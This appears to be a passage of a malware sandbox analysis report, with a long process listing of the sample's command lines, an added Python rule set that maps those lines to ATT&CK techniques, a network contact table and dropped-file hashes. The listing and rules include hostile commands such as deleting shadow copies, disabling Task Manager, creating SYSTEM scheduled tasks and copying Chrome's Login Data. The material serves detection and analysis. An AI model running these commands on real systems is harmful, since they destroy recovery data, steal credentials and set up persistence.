"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mshta.exe "C:\Windows\System32\Info.hta"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mshta.exe "C:\Users\Admin\AppData\Roaming\Info.hta"

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\29.dll f1 C:\Users\Admin\AppData\Roaming\29.exe@13804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 13804 -ip 13804

C:\Program Files (x86)\Uftg\nnennq.exe

"C:\Program Files (x86)\Uftg\nnennq.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Program Files (x86)\Uftg\nnennq.exeapter

C:\Windows\system32\mode.com

mode con cp select=1251

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 13804 -s 492

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\29.dll,f0

C:\Program Files (x86)\Uftg\nnennq.exe

"C:\Program Files (x86)\Uftg\nnennq.exe"

C:\Windows\SysWOW64\autoconv.exe

"C:\Windows\SysWOW64\autoconv.exe"

C:\Users\Admin\AppData\Roaming\27.exe

C:\Users\Admin\AppData\Roaming\27.exe /C

C:\Windows\system32\mshta.exe

mshta.exe "C:\Windows\System32\Info.hta"

C:\Windows\SysWOW64\systray.exe

"C:\Windows\SysWOW64\systray.exe"

C:\Windows\system32\mshta.exe

mshta.exe "C:\Users\Admin\AppData\Roaming\Info.hta"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qATVyEXYNcqQZF" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE21E.tmp"

C:\Users\Admin\AppData\Roaming\26.exe

"{path}"

C:\Users\Admin\AppData\Roaming\26.exe

"{path}"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\SysWOW64\netsh.exe

"netsh" wlan show profile

C:\Windows\SysWOW64\netsh.exe

"netsh" wlan show profile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\MSBuild.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Pcllkyiz\oeuul.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Pcllkyiz\oeuul.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn cguaoqu /tr "\"C:\Users\Admin\AppData\Roaming\27.exe\" /I cguaoqu" /SC ONCE /Z /ST 05:16 /ET 05:28

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:7884 CREDAT:17410 /prefetch:2

C:\Program Files (x86)\Kudftrf0\jjli4n.exe

"C:\Program Files (x86)\Kudftrf0\jjli4n.exe"

C:\Windows\SysWOW64\REG.exe

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\netsh.exe

"netsh" wlan show profile

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnLKhBlJfQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp8D13.tmp"

C:\Users\Admin\AppData\Roaming\Microsoft\Pcllkyiz\oeuul.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Pcllkyiz\oeuul.exe /C

C:\Program Files (x86)\Kudftrf0\jjli4n.exe

"{path}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\CpSnJ\CpSnJ.exe

C:\Program Files (x86)\Jprfxr\xdclkzixuh8.exe

"C:\Program Files (x86)\Jprfxr\xdclkzixuh8.exe"

C:\Windows\SysWOW64\cmmon32.exe

"C:\Windows\SysWOW64\cmmon32.exe"
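
The process listing above is long enough that the interesting command lines (shadow-copy deletion, Run-key persistence through pcalua.exe, scheduled tasks registered from XML and as SYSTEM, mshta launching Info.hta from the Startup folder, the Chrome Login Data copy, netsh Wi-Fi profile enumeration, LOLBin hosts such as regsvr32, rundll32, InstallUtil and MSBuild) are easy to miss. The Python below is an added example, not part of the report or the sandbox's own signature engine: a small rule set run over a subset of the command lines copied from the listing. The ATT&CK technique IDs are this example's own mapping, chosen by the editor, and "heuristic" marks behaviour with no single technique (the code page switch to 1251 and the JAR launch from the user profile).

```python
import re
from collections import Counter

# Constructed input: command lines copied from the Processes listing of this
# report (a representative subset, not the complete list).
SAMPLE_CMDLINES = [
    r'"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6A72.tmp\6A73.tmp\6A74.bat C:\Users\Admin\AppData\Local\Temp\31.exe"',
    r'"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\1.jar"',
    r'"cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"',
    r'/c del "C:\Users\Admin\AppData\Roaming\2.exe"',
    r'C:\Windows\system32\pcalua.exe -a C:\Users\Admin\AppData\Roaming\feeed.exe',
    r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnLKhBlJfQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp99A0.tmp"',
    r'C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\4.dll f1 C:\Users\Admin\AppData\Roaming\4.exe@5004',
    r'C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\4.dll,f0',
    r'C:\Windows\system32\cmd.exe /c C:\Windows\System32\16.exe',
    r'mode con cp select=1251',
    r'vssadmin delete shadows /all /quiet',
    r'"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"',
    r'/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V',
    r'"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"',
    r'"netsh" wlan show profile',
    r'"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\MSBuild.exe"',
    r'"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn cguaoqu /tr "\"C:\Users\Admin\AppData\Roaming\27.exe\" /I cguaoqu" /SC ONCE /Z /ST 05:16 /ET 05:28',
    r'REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f',
    r'"C:\Windows\SysWOW64\NETSTAT.EXE"',
]

# Heuristic rules (technique, description, pattern). The ATT&CK IDs are this
# example's own mapping, not labels emitted by the sandbox.
RULES = [(tech, desc, re.compile(pat, re.I)) for tech, desc, pat in [
    ("T1490",     "shadow copies deleted (inhibit recovery)",        r"vssadmin.*delete\s+shadows"),
    ("T1053.005", "scheduled task created",                          r"schtasks(\.exe)?\"?\s+/Create"),
    ("T1053.005", "scheduled task registered to run as SYSTEM",      r"schtasks.*/RU\s+\"NT AUTHORITY\\SYSTEM\""),
    ("T1547.001", "Run key or Startup folder used for autostart",    r"CurrentVersion\\Run\b|\\Startup\\"),
    ("T1112",     "Task Manager disabled through a policy key",      r"DisableTaskMgr"),
    ("T1218",     "pcalua.exe used as an execution proxy",           r"pcalua\.exe\"?\s+-a\s"),
    ("T1218.005", "mshta executing an .hta",                         r"mshta(\.exe)?\"?\s+.*\.hta"),
    ("T1218.010", "regsvr32 loading a DLL from the user profile",    r"regsvr32.*\\Users\\.*\.dll"),
    ("T1218.011", "rundll32 loading a DLL from the user profile",    r"rundll32.*\\Users\\.*\.dll"),
    ("T1218.004", "InstallUtil copied to Temp and run from there",   r"\\Temp\\InstallUtil\.exe"),
    ("T1127.001", "MSBuild started as a host process",               r"MSBuild\.exe"),
    ("T1555.003", "browser credential database copied",              r"copy\s+.*Login Data"),
    ("T1016",     "Wi-Fi profiles enumerated",                       r"netsh.*wlan\s+show\s+profile"),
    ("T1049",     "active network connections listed",               r"NETSTAT\.EXE"),
    ("T1070.004", "self-deletion via cmd /c del",                    r"/c\s+del\s+\""),
    ("T1036.005", "numeric-named payload executed from System32",    r"\\System32\\\d+\.exe"),
    ("T1059.003", "batch script launched from Temp",                 r"\\Temp\\.*\.bat\b"),
    ("heuristic", "JAR launched from the user profile via javaw",    r"javaw\.exe\"?\s+-jar"),
    ("heuristic", "console code page switched to 1251 (Cyrillic)",   r"mode\s+con\s+cp\s+select=1251"),
]]


def scan(cmdlines):
    """Return every (technique, description, cmdline) hit; a line may hit several rules."""
    findings = []
    for cl in cmdlines:
        for tech, desc, pat in RULES:
            if pat.search(cl):
                findings.append({"technique": tech, "description": desc, "cmdline": cl})
    return findings


def techniques_for(findings, cmdline):
    return {f["technique"] for f in findings if f["cmdline"] == cmdline}


def technique_counts(findings):
    return dict(Counter(f["technique"] for f in findings if f["technique"] != "heuristic"))


if __name__ == "__main__":
    hits = scan(SAMPLE_CMDLINES)
    for f in hits:
        print(f"{f['technique']:<10} {f['description']:<48} {f['cmdline'][:70]}")
    print(technique_counts(hits))
```

Multiple hits on one line are the useful part: the REG ADD line matches both the Run-key rule and the pcalua rule, which is exactly the detail an analyst wants (persistence that launches the payload through a signed proxy rather than directly), and the Startup-folder Info.hta line matches both mshta and autostart.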

Network

Country Destination Domain Proto
US 8.8.8.8:53 nodejs.org udp
US 172.66.128.116:443 nodejs.org tcp
US 8.8.8.8:53 telete.in udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
FR 92.204.160.54:443 tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 runeurotoolz.hopto.org udp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
NL 93.115.21.29:443 tcp
US 8.8.8.8:53 www.dsooneclinicianexpert.com udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 www.mezhyhirya.com udp
US 8.8.8.8:53 ffvgdsv.ug udp
US 3.33.130.190:80 www.mezhyhirya.com tcp
US 199.59.243.228:443 telete.in tcp
NL 193.34.166.247:443 tcp
NL 2.56.213.179:443 tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 www.eatatnobu.com udp
US 3.33.130.190:80 www.eatatnobu.com tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 8.8.8.8:53 onedrive.live.com udp
US 8.8.8.8:53 ffvgdsv.ug udp
US 13.107.139.11:443 onedrive.live.com tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 smtp.yandex.com udp
US 199.59.243.228:443 telete.in tcp
RU 77.88.21.158:587 smtp.yandex.com tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 sibelikinciel.xyz udp
US 8.8.8.8:53 sibelikinciel.xyz udp
US 8.8.8.8:53 www.androidaso.com udp
DE 3.75.10.80:80 www.androidaso.com tcp
US 8.8.8.8:53 ffvgdsv.ug udp
NL 193.34.166.247:443 tcp
NL 45.153.186.47:443 tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 cmdtech.com.vn udp
US 8.8.8.8:53 telete.in udp
VN 202.92.6.10:443 cmdtech.com.vn tcp
US 199.59.243.228:443 telete.in tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.18.190.198:80 r11.o.lencr.org tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 sibelikinciel.xyz udp
US 8.8.8.8:53 sibelikinciel.xyz udp
NL 185.45.193.50:443 tcp
US 8.8.8.8:53 udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 www.mysteryvacay.com udp
US 199.59.243.228:443 telete.in tcp
US 15.197.225.128:80 www.mysteryvacay.com tcp
US 15.197.225.128:80 www.mysteryvacay.com tcp
US 15.197.225.128:80 www.mysteryvacay.com tcp
US 8.8.8.8:53 ffvgdsv.ug udp
NL 193.34.166.247:443 tcp
NL 193.34.166.247:443 tcp
NL 193.34.166.247:443 tcp
NL 185.45.193.50:443 tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 www.amazoncarpet.com udp
US 52.71.57.184:80 www.amazoncarpet.com tcp
US 52.71.57.184:80 www.amazoncarpet.com tcp
US 52.71.57.184:80 www.amazoncarpet.com tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
VN 202.92.6.10:443 cmdtech.com.vn tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 www.dannynhois.com udp
US 199.59.243.228:443 telete.in tcp
NL 45.153.186.47:443 tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 sibelikinciel.xyz udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 smtp.ecojett.co udp
US 8.8.8.8:53 www.garrettfitz.com udp
US 34.149.87.45:80 www.garrettfitz.com tcp
US 34.149.87.45:80 www.garrettfitz.com tcp
US 34.149.87.45:80 www.garrettfitz.com tcp
VN 202.92.6.10:443 cmdtech.com.vn tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 smtp.zoho.eu udp
IE 89.36.170.164:587 smtp.zoho.eu tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 www.uppertenpiercings.amsterdam udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 smtp.yandex.com udp
RU 77.88.21.158:587 smtp.yandex.com tcp
US 8.8.8.8:53 www.europartnersplus.com udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 www.europartnersplus.com udp
VN 202.92.6.10:443 cmdtech.com.vn tcp
US 8.8.8.8:53 telete.in udp
US 199.59.243.228:443 telete.in tcp
NL 2.56.213.179:443 tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 www.langongzi.net udp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 www.kms-sp.com udp
JP 202.254.234.127:80 www.kms-sp.com tcp
JP 202.254.234.127:80 www.kms-sp.com tcp
JP 202.254.234.127:80 www.kms-sp.com tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp

Files

C:\Users\Admin\AppData\Local\Temp\6A72.tmp\6A73.tmp\6A74.bat

MD5 ba36077af307d88636545bc8f585d208
SHA1 eafa5626810541319c01f14674199ab1f38c110c
SHA256 bec099c24451b843d1b5331686d5f4a2beff7630d5cd88819446f288983bda10
SHA512 933c2e5de3bc180db447e6864d7f0fa01e796d065fcd8f3d714086f49ec2f3ae8964c94695959beacf07d5785b569fd4365b7e999502d4afa060f4b833b68d80

C:\Users\Admin\AppData\Roaming\1.jar

MD5 a5d6701073dbe43510a41e667aaba464
SHA1 e3163114e4e9f85ffd41554ac07030ce84238d8c
SHA256 1d635c49289d43e71e2b10b10fbb9ea849a59eacedfdb035e25526043351831c
SHA512 52f711d102cb50fafefc2a9f2097660b950564ff8e9324471b9bd6b7355321d60152c78f74827b05b6332d140362bd2c638b8c9cdb961431ab5114e01851fbe4

C:\Users\Admin\AppData\Roaming\2.exe

MD5 715c838e413a37aa8df1ef490b586afd
SHA1 4aef3a0036f9d2290f7a6fa5306228abdbc9e6e1
SHA256 4c21a70dbc6b9bc5e1ee1e7506ee205eecdb14cc45571423e6bcc86dbe4001e7
SHA512 af13c0efb1552bbfbb517e27ff70a00cba5c230e3d2e707bd28a9ccce40e0402793c4ecc32ba1418f19a3744b78b89e5c8709eae3ad5f883c474832c182de861

C:\Users\Admin\AppData\Roaming\3.exe

MD5 d2e2c65fc9098a1c6a4c00f9036aa095
SHA1 c61b31c7dbebdd57a216a03a3dc490a3ea9f5abd
SHA256 4d7421e6d0ac81e2292bcff52f7432639c4f434519db9cf2985b46a0069b2be8
SHA512 b5bd047ca4ee73965719669b29478a9d33665752e1dbe0f575a2da759b90819e64125675da749624b2d8c580707fd6a932685ab3962b5b88353981e857fe9793

C:\Users\Admin\AppData\Roaming\4.exe

MD5 ec7506c2b6460df44c18e61d39d5b1c0
SHA1 7c3e46cd7c93f3d9d783888f04f1607f6e487783
SHA256 4e36dc0d37ead94cbd7797668c3c240ddc00fbb45c18140d370c868915b8469d
SHA512 cf16f6e5f90701a985f2a2b7ad782e6e1c05a7b6dc0e644f7bdd0350f717bb4c9e819a8e9f383da0324b92f354c74c11b2d5827be42e33f861c233f3baab687e

C:\Users\Admin\AppData\Roaming\5.exe

MD5 4fcc5db607dbd9e1afb6667ab040310e
SHA1 48af3f2d0755f0fa644fb4b7f9a1378e1d318ab9
SHA256 6fb0eacc8a7abaa853b60c064b464d7e87b02ef33d52b0e9a928622f4e4f37c7
SHA512 a46ded4552febd7983e09069d26ab2885a8087a9d43904ad0fedcc94a5c65fe0124bbf0a7d3e7283cb3459883e53c95f07fa6724b45f3a9488b147de42221a26

memory/1440-81-0x0000000000400000-0x000000000042D000-memory.dmp

memory/3152-85-0x0000000000400000-0x00000000004B0000-memory.dmp

C:\Users\Admin\AppData\Roaming\6.exe

MD5 cf04c482d91c7174616fb8e83288065a
SHA1 6444eb10ec9092826d712c1efad73e74c2adae14
SHA256 7b01d36ac9a77abfa6a0ddbf27d630effae555aac9ae75b051c6eedaf18d1dcf
SHA512 3eca1e17e698c427bc916465526f61caee356d7586836b022f573c33a6533ce4b4b0f3fbd05cc2b7b44568e814121854fdf82480757f02d925e293f7d92a2af6

C:\Users\Admin\AppData\Roaming\7.exe

MD5 42d1caf715d4bd2ea1fade5dffb95682
SHA1 c26cff675630cbc11207056d4708666a9c80dab5
SHA256 8ea389ee2875cc95c5cd2ca62ba8a515b15ab07d0dd7d85841884cbb2a1fceea
SHA512 b21a0c4b19ffbafb3cac7fad299617ca5221e61cc8d0dca6d091d26c31338878b8d24fe98a52397e909aaad4385769aee863038f8c30663130718d577587527f

memory/928-102-0x000002779E2C0000-0x000002779E2C1000-memory.dmp

C:\Users\Admin\AppData\Roaming\8.exe

MD5 dea5598aaf3e9dcc3073ba73d972ab17
SHA1 51da8356e81c5acff3c876dffbf52195fe87d97f
SHA256 8ec9516ac0a765c28adfe04c132619170e986df07b1ea541426be124fb7cfd2c
SHA512 a6c674ba3d510120a1d163be7e7638f616eedb15af5653b0952e63b7fd4c2672fafc9638ab7795e76b7f07d995196437d6c35e5b8814e9ad866ea903f620e81e

memory/4572-106-0x00000000003E0000-0x000000000048C000-memory.dmp

memory/4572-110-0x0000000004C20000-0x0000000004C34000-memory.dmp

memory/4480-112-0x0000000000570000-0x0000000000580000-memory.dmp

memory/4572-122-0x00000000052F0000-0x0000000005894000-memory.dmp

memory/4572-124-0x0000000004E40000-0x0000000004ED2000-memory.dmp

memory/4572-123-0x0000000004D30000-0x0000000004D38000-memory.dmp

C:\Users\Admin\AppData\Roaming\9.exe

MD5 ea88f31d6cc55d8f7a9260245988dab6
SHA1 9e725bae655c21772c10f2d64a5831b98f7d93dd
SHA256 33f77b1bca36469dd734af67950223a7b1babd62a25cb5f0848025f2a68b9447
SHA512 5952c4540b1ae5f2db48aaae404e89fb477d233d9b67458dd5cecc2edfed711509d2e968e6af2dbb3bd2099c10a4556f7612fc0055df798e99f9850796a832ad

memory/4932-131-0x00000000007E0000-0x000000000089E000-memory.dmp

memory/4932-137-0x00000000052F0000-0x00000000052FA000-memory.dmp

memory/4572-139-0x0000000004F80000-0x0000000004F88000-memory.dmp

memory/4572-141-0x0000000004FA0000-0x0000000004FA8000-memory.dmp

memory/4572-140-0x0000000005030000-0x0000000005074000-memory.dmp

C:\Users\Admin\AppData\Roaming\10.exe

MD5 68f96da1fc809dccda4235955ca508b0
SHA1 f182543199600e029747abb84c4448ac4cafef82
SHA256 34b63aa5d2cff68264891f11e8d6875a38ff28854e9723b1db9c154a5abe580c
SHA512 8512aa47d9d2062a8943239ab91a533ad0fa2757aac8dba53d240285069ddbbff8456df20c58e063661f7e245cb99ccbb49c6f9a81788d46072d5c8674da40f7

memory/1440-162-0x0000000000460000-0x000000000046B000-memory.dmp

memory/3184-164-0x0000000000920000-0x000000000092B000-memory.dmp

memory/1440-163-0x0000000000400000-0x000000000042D000-memory.dmp

memory/4932-171-0x0000000007CA0000-0x0000000007D3C000-memory.dmp

memory/4932-170-0x0000000007B90000-0x0000000007BE8000-memory.dmp

memory/4932-165-0x0000000005700000-0x0000000005708000-memory.dmp

C:\Users\Admin\AppData\Roaming\11.exe

MD5 9d4da0e623bb9bb818be455b4c5e97d8
SHA1 9bc2079b5dd2355f4d98a2fe9879b5db3f2575b0
SHA256 091ff5f5bab1cbb2d27a32fedaff1f64dd4004e4a68665e8d606e28585d928a8
SHA512 6e6fab5f4a045349717762ff782527e778b40c5f41ce32428c63aea0dd6e8b73bfdaf3ac55474275f716e9f84632906196edafc4337d816055a69b2ea0904e37

memory/928-187-0x000002779E2C0000-0x000002779E2C1000-memory.dmp

C:\Users\Admin\AppData\Roaming\12.exe

MD5 192830b3974fa27116c067f019747b38
SHA1 469fd8a31d9f82438ab37413dae81eb25d275804
SHA256 116e5f36546b2ec14aba42ff69f2c9e18ecde3b64abb44797ac9efc6c6472bff
SHA512 74ebe5adb71c6669bc39fc9c8359cc6bc9bb1a77f5de8556a1730de23104fe95ec7a086c19f39706286b486314deafd7e043109414fd5ce0584f2fbbc6d0658a

memory/3368-231-0x0000000000C40000-0x0000000000C41000-memory.dmp

memory/928-243-0x000002779E2C0000-0x000002779E2C1000-memory.dmp

memory/3368-261-0x00000000008D0000-0x00000000008D1000-memory.dmp

memory/2472-259-0x0000000000400000-0x000000000055D000-memory.dmp

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\docs\public\cli-commands\npm-bugs\index.html

MD5 d0fcb234527b62597027adfe909a58d1
SHA1 e46877bfb15bbdb029aaa7777b952b3b30b0695c
SHA256 fa6dae131ec446c7a489fff6ef3d6952f8e34cf113eb3df7c8c643697492f617
SHA512 c7850e31c0a7cdd810fa778400a519d5ce34499fa8f660aac5288a88b72badefbb2e657fda3db9260ea442b7b930da1011b181b101d117410428af04fc0e78a1

memory/5004-282-0x0000000000400000-0x000000000300E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp99A0.tmp

MD5 06a9f2b2bb71dac4c45df1ed6ba5289a
SHA1 b9661427441fbce20db2b090fb25cc93dd31e527
SHA256 fe4921bdff41eeadc4df7f7c23bc75d6daba064ab5100fd1ee825acbe691d3f4
SHA512 cfa669904eba220a91031516f36434c96346b94ca131036e1611ccc1e5f842167ef357d6d08cec4f778735b22d2f351130de145e32c53d53c81f23ece868a3ea

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\cliui\node_modules\strip-ansi\license

MD5 5ad87d95c13094fa67f25442ff521efd
SHA1 01f1438a98e1b796e05a74131e6bb9d66c9e8542
SHA256 67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec
SHA512 7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\crypto-random-string\license

MD5 940fdc3603517c669566adb546f6b490
SHA1 df8b7ea6dff65e7dd31a4e2f852fb6f2b45b7aa3
SHA256 6b18e4f3ea8443739a64c95ecf793b45e4a04748da67e4a1479c3f4bba520bd6
SHA512 9e2cf5b0c3105c7ec24b8382a9c856fc3d41a6903f9817f57f87f670073884c366625bc7dee6468bb4cbd0c0f3b716f9c7c597058098141e5a325632ea736452

memory/4024-1631-0x0000000000400000-0x000000000042D000-memory.dmp

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\doc\wg-meetings\2015-01-30.md

MD5 fda6b96a1cac19d11bcdee8af70e5299
SHA1 449cff987f8b8d79b53c9ab93a7dc18f6d6f3ca8
SHA256 b5108c42d95185b1b71e86963bf784ddfd123da4178d41cef052be08c6429cb6
SHA512 f6483ffffc8a71a583d70fe6c4bf001a95f9c8a6b4e70fa0e322f2008170144794ddb42a396fb694b8039cb4a572a655ff877dd95d3ac95b6f6aafeab390a670

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\.travis.yml

MD5 b112fec5b79951448994711bbc7f6866
SHA1 b7358185786bf3d89e8442ac0a334467c5c2019b
SHA256 c3d79e198270443970b49c4f3e136551eb6c7c81a2300b931ae32ce17dad0967
SHA512 d46e1c11a6604e413163a2092e1a9925adc7b5df48a07fa70e87dd0216e7ef432bed3f3c75bed4f1ad4d707b7aeddce63abfca3d4bd1c6e29f215f8e258d5737

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\_stream_duplex.js

MD5 63b92584e58004c03054b4b0652b3417
SHA1 67efe53912c6d4cdeb00227deb161fe0f13e5bfb
SHA256 76d5dc9dcae35daa0a237fe11ef912b89dcf25c790f4d6ba1eadc2c97e8dad4c
SHA512 ca5ada5a9b0070ee9eaa1b70e3690fae1880a77bafc050c24019fd28c90bb98479237e0dfd9209994e1e44617f8dd2f7aa75133a6e1a034c18ae55504f076837

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\_stream_passthrough.js

MD5 41247801fc7f4b8f391bc866daf2c238
SHA1 d858473534bfbd539414b9e3353adfc255eed88b
SHA256 d5e328cb2e044902c3ace9da8d277298b04bcb4046bcd5a4cd3d701e56497d6c
SHA512 c9197747ddc57818474c861e4ce920a98a5d0a32589ef2d08fd37320daac2400512b23b51cbb89999fca1ca17f375daf3453ced8e2a5e9aa538a371f31f5561b

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\fs-minipass\LICENSE

MD5 b020de8f88eacc104c21d6e6cacc636d
SHA1 20b35e641e3a5ea25f012e13d69fab37e3d68d6b
SHA256 3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706
SHA512 4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\string_decoder\README.md

MD5 a92ecc29f851c8431af9a2d3f0555f01
SHA1 06591e3ff094c58b1e48d857efdadb240eafb220
SHA256 6b8a003975a1c056caee0284b9e1930192cac1bd0ea2181f594290057d2c0687
SHA512 347ae85c821e06ba6e239ec2230c52dee6ca68ab52ccf9f57067e7152b9be0f832d4bbc7f30ffd4784427a81c0797af8b46bce8b4ab9fc0843f6424676a64b5c

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\string_decoder\LICENSE

MD5 48ab8421424b7cacb139e3355864b2ad
SHA1 819a1444fb5d4ea6c70d025affc69f9992c971c9
SHA256 9d364120560d6770fd7e663d23311f871c2c597327cd4c1fced97dbab25183f4
SHA512 b6029a0f811c1c8fbdd9d57cdc16ff469cc8a023468a0390643270ffe21774de02cd950908355df71ed95d2b7c27387478f88cb1fd23d84b45c47a97364edf15

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\string_decoder\lib\string_decoder.js

MD5 81fc92e6c5299a2a99c710a228d3299b
